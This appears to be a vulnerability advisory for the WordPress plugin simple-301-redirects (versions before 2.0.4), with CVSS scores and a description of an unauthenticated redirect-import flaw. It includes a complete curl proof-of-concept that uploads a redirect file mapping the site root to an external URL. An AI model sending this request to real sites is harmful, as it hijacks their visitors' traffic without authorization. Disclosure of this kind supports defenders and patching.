8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
The import_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to import a set of site redirects.
curl -i -s -k -X $‘POST’ \ -H $‘Host: [URL_HERE]’ -H $‘Content-Length: 379’ -H $‘Cache-Control: max-age=0’ -H $‘Upgrade-Insecure-Requests: 1’ -H $‘Origin: http://[URL_HERE]’ -H $‘Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKPMqn9qY39X09NY’ -H $‘User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36’ -H $‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9’ -H $‘Referer: [URL]/wp-admin/options-general.php?page=301options’ -H $‘Accept-Encoding: gzip, deflate’ -H $‘Accept-Language: en-US,en;q=0.9’ -H $‘Connection: close’ \ --data-binary $‘------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name="upload_file"; filename="simple-301-redirects.2021-04-08 (1).json"\x0d\x0aContent-Type: application/json\x0d\x0a\x0d\x0a{"/":"https:\/\/google.com"}\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY\x0d\x0aContent-Disposition: form-data; name="submit"\x0d\x0a\x0d\x0aImport File\x0d\x0a------WebKitFormBoundaryHKPMqn9qY39X09NY–\x0d\x0a’ \ $‘[URL]/wp-admin/admin-post.php?page=301options&import;=true’
CPE | Name | Operator | Version |
---|---|---|---|
simple-301-redirects | lt | 2.0.4 |
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P